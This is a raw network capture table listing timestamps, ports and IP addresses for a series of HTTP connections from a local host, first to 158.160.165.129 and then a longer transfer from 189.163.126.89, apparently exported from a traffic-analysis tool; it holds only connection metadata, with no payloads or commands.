Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 25, 2024 21:29:23.036571026 CEST	49736	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:23.042032957 CEST	80	49736	158.160.165.129	192.168.2.4
May 25, 2024 21:29:23.042284966 CEST	49736	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:23.042406082 CEST	49736	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:23.046097040 CEST	49736	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:23.093955994 CEST	80	49736	158.160.165.129	192.168.2.4
May 25, 2024 21:29:23.139525890 CEST	80	49736	158.160.165.129	192.168.2.4
May 25, 2024 21:29:23.900290012 CEST	80	49736	158.160.165.129	192.168.2.4
May 25, 2024 21:29:23.902832985 CEST	49736	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:23.905308008 CEST	80	49736	158.160.165.129	192.168.2.4
May 25, 2024 21:29:23.905407906 CEST	49736	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:23.914585114 CEST	49737	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:23.961910963 CEST	80	49736	158.160.165.129	192.168.2.4
May 25, 2024 21:29:23.966736078 CEST	80	49737	158.160.165.129	192.168.2.4
May 25, 2024 21:29:23.966912031 CEST	49737	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:23.967891932 CEST	49737	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:23.967955112 CEST	49737	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:24.024707079 CEST	80	49737	158.160.165.129	192.168.2.4
May 25, 2024 21:29:24.072931051 CEST	80	49737	158.160.165.129	192.168.2.4
May 25, 2024 21:29:24.697138071 CEST	80	49737	158.160.165.129	192.168.2.4
May 25, 2024 21:29:24.701863050 CEST	80	49737	158.160.165.129	192.168.2.4
May 25, 2024 21:29:24.701966047 CEST	49737	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:24.701967001 CEST	49737	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:24.707103014 CEST	80	49737	158.160.165.129	192.168.2.4
May 25, 2024 21:29:24.793327093 CEST	49738	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:24.807547092 CEST	80	49738	158.160.165.129	192.168.2.4
May 25, 2024 21:29:24.807657003 CEST	49738	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:24.807765961 CEST	49738	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:24.808000088 CEST	49738	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:24.872095108 CEST	80	49738	158.160.165.129	192.168.2.4
May 25, 2024 21:29:24.922775030 CEST	80	49738	158.160.165.129	192.168.2.4
May 25, 2024 21:29:25.521806955 CEST	80	49738	158.160.165.129	192.168.2.4
May 25, 2024 21:29:25.522037029 CEST	49738	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:25.525528908 CEST	49739	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:25.530639887 CEST	80	49738	158.160.165.129	192.168.2.4
May 25, 2024 21:29:25.530709028 CEST	49738	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:25.577317953 CEST	80	49738	158.160.165.129	192.168.2.4
May 25, 2024 21:29:25.627414942 CEST	80	49739	158.160.165.129	192.168.2.4
May 25, 2024 21:29:25.627880096 CEST	49739	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:25.627974033 CEST	49739	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:25.628019094 CEST	49739	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:25.684750080 CEST	80	49739	158.160.165.129	192.168.2.4
May 25, 2024 21:29:25.735804081 CEST	80	49739	158.160.165.129	192.168.2.4
May 25, 2024 21:29:26.362864017 CEST	80	49739	158.160.165.129	192.168.2.4
May 25, 2024 21:29:26.363332987 CEST	49739	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:26.367712975 CEST	80	49739	158.160.165.129	192.168.2.4
May 25, 2024 21:29:26.368172884 CEST	49739	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:26.413799047 CEST	80	49739	158.160.165.129	192.168.2.4
May 25, 2024 21:29:26.434209108 CEST	49740	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:26.439210892 CEST	80	49740	158.160.165.129	192.168.2.4
May 25, 2024 21:29:26.439304113 CEST	49740	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:26.439460993 CEST	49740	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:26.439519882 CEST	49740	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:26.489588022 CEST	80	49740	158.160.165.129	192.168.2.4
May 25, 2024 21:29:26.539366007 CEST	80	49740	158.160.165.129	192.168.2.4
May 25, 2024 21:29:27.185319901 CEST	80	49740	158.160.165.129	192.168.2.4
May 25, 2024 21:29:27.185517073 CEST	49740	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:27.191229105 CEST	80	49740	158.160.165.129	192.168.2.4
May 25, 2024 21:29:27.191317081 CEST	49740	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:27.195816040 CEST	49741	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:27.239391088 CEST	80	49740	158.160.165.129	192.168.2.4
May 25, 2024 21:29:27.244296074 CEST	80	49741	158.160.165.129	192.168.2.4
May 25, 2024 21:29:27.244514942 CEST	49741	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:27.244514942 CEST	49741	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:27.244514942 CEST	49741	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:27.309333086 CEST	80	49741	158.160.165.129	192.168.2.4
May 25, 2024 21:29:27.359427929 CEST	80	49741	158.160.165.129	192.168.2.4
May 25, 2024 21:29:27.978342056 CEST	80	49741	158.160.165.129	192.168.2.4
May 25, 2024 21:29:27.982028961 CEST	49741	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:27.983061075 CEST	80	49741	158.160.165.129	192.168.2.4
May 25, 2024 21:29:27.983140945 CEST	49741	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:27.985302925 CEST	49742	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:28.031820059 CEST	80	49741	158.160.165.129	192.168.2.4
May 25, 2024 21:29:28.036931992 CEST	80	49742	158.160.165.129	192.168.2.4
May 25, 2024 21:29:28.037194014 CEST	49742	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:28.037194014 CEST	49742	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:28.037194967 CEST	49742	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:28.094082117 CEST	80	49742	158.160.165.129	192.168.2.4
May 25, 2024 21:29:28.143662930 CEST	80	49742	158.160.165.129	192.168.2.4
May 25, 2024 21:29:28.747720003 CEST	80	49742	158.160.165.129	192.168.2.4
May 25, 2024 21:29:28.747947931 CEST	49742	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:28.751291990 CEST	49743	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:28.754204988 CEST	80	49742	158.160.165.129	192.168.2.4
May 25, 2024 21:29:28.754277945 CEST	49742	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:28.799348116 CEST	80	49742	158.160.165.129	192.168.2.4
May 25, 2024 21:29:28.810687065 CEST	80	49743	158.160.165.129	192.168.2.4
May 25, 2024 21:29:28.810895920 CEST	49743	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:28.810993910 CEST	49743	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:28.810993910 CEST	49743	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:28.875555038 CEST	80	49743	158.160.165.129	192.168.2.4
May 25, 2024 21:29:28.924124956 CEST	80	49743	158.160.165.129	192.168.2.4
May 25, 2024 21:29:29.545032024 CEST	80	49743	158.160.165.129	192.168.2.4
May 25, 2024 21:29:29.549786091 CEST	80	49743	158.160.165.129	192.168.2.4
May 25, 2024 21:29:29.550020933 CEST	49743	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:29.665766954 CEST	49743	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:29.671713114 CEST	80	49743	158.160.165.129	192.168.2.4
May 25, 2024 21:29:33.337085009 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:33.389286995 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:33.389509916 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:33.389586926 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:33.441790104 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.543318987 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.545523882 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.545737028 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.553687096 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.553700924 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.553895950 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.560971022 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.614006042 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.655028105 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.657352924 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.657556057 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.661200047 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.665553093 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.665564060 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.665839911 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.673690081 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.674042940 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.677892923 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.718997002 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.742283106 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.756093025 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.756372929 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.757687092 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.760848045 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.761092901 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.765136003 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.766175032 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.766247034 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.767869949 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.769918919 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.770009041 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.772103071 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.774260044 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.774456024 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.776319027 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.785316944 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.785329103 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.785523891 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.785552979 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.785564899 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.785598040 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.790616035 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.790828943 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.869580984 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.870477915 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.870587111 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.872781038 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.874794006 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.874805927 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.874970913 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.877012014 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.877233982 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.877762079 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.879547119 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.879720926 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.881355047 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.881367922 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.881431103 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.886815071 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.887032986 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.887113094 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.974431038 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.978734970 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.978935003 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.979592085 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.981489897 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.981503010 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.981513023 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.981704950 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.981705904 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.985361099 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.987469912 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.987560987 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.990823030 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.990834951 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.990839958 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.990901947 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.992856026 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.993240118 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.994363070 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.994374990 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.994384050 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.994389057 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.994548082 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:34.997610092 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.997620106 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:34.997747898 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.000324965 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.001302004 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.001477003 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.002819061 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.002830982 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.002898932 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.005784035 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.005794048 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.006094933 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.008826971 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.008837938 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.009156942 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.011770964 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.011781931 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.011786938 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.011930943 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.014030933 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.014059067 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.014223099 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.016038895 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.016051054 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.016100883 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.017987013 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.018044949 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.086596966 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.087086916 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.087296009 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.088378906 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.089607954 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.089695930 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.090879917 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.097872019 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.097939968 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.098494053 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.102859974 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.102871895 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.102881908 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.102888107 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.103038073 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.103038073 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.103759050 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.103785992 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.103842974 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.105257034 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.105268955 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.105319977 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.107656956 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.107669115 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.107846975 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.194504976 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.195368052 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.195780039 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.196182966 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.197441101 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.197453022 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.197726965 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.198704004 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.198775053 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.199968100 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.201217890 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.201273918 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.201878071 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.202836990 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.202847958 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.202903032 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.204797029 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.204808950 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.204875946 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.205841064 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.205909967 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.207236052 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.207247972 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.207257986 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.207324028 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.208861113 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.208911896 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.209919930 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.209932089 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.209989071 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.211880922 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.211893082 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.212083101 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.213452101 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.213464975 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.213522911 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.215054035 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.215068102 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.215078115 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.215120077 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.216831923 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.216891050 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.217245102 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.217901945 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.217958927 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.218605995 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.219364882 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.219420910 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.220093966 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.220834017 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.220884085 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.221626997 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.221640110 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.221649885 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.221697092 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.223051071 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.223062992 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.223117113 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.224467039 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.224478960 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.224526882 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.225869894 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.225881100 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.225922108 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.227300882 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.227313995 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.227369070 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.228621960 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.228635073 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.228643894 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.228707075 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.228708029 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.229984999 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.229996920 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.230083942 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.231209040 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.231220961 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.231467962 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.232359886 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.232372999 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.232434988 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.233630896 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.233642101 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.233690977 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.285027981 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.285335064 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.413691998 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.413979053 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.414150000 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.414849997 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.415313959 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.415385962 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.415947914 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.415960073 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.416003942 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.417253017 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.417263985 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.417273045 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.417327881 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.418579102 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.418590069 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.418637037 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.419825077 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.419836044 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.419898033 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.421747923 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.421802044 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.422060966 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.422557116 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.422633886 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.423099041 CEST	80	49744	189.163.126.89	192.168.2.4
